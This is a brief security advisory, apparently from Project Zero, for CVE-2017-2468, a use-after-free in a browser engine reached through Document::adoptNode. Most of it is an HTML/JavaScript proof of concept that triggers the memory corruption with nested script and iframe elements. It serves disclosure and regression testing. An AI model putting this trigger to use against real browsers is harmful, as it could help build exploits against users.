CVE-2017-2468

Use-After-Free via Document::adoptNode

Reported by [email protected], Jan 23 2017

This is a regression test from: https://crbug.com/541206

PoC:

<body>
<script>

var s = document.body.appendChild(document.createElement('script'));
s.type = '0';
s.textContent = 'document.body.appendChild(parent.i0)';

var i0 = s.appendChild(document.createElement('iframe'));
s.type = '';

var f = document.body.appendChild(document.createElement('iframe'));
f.contentDocument.adoptNode(i0);
f.src = 'about:blank';

</script>
</body>

Link: https://bugs.chromium.org/p/project-zero/issues/detail?id=1099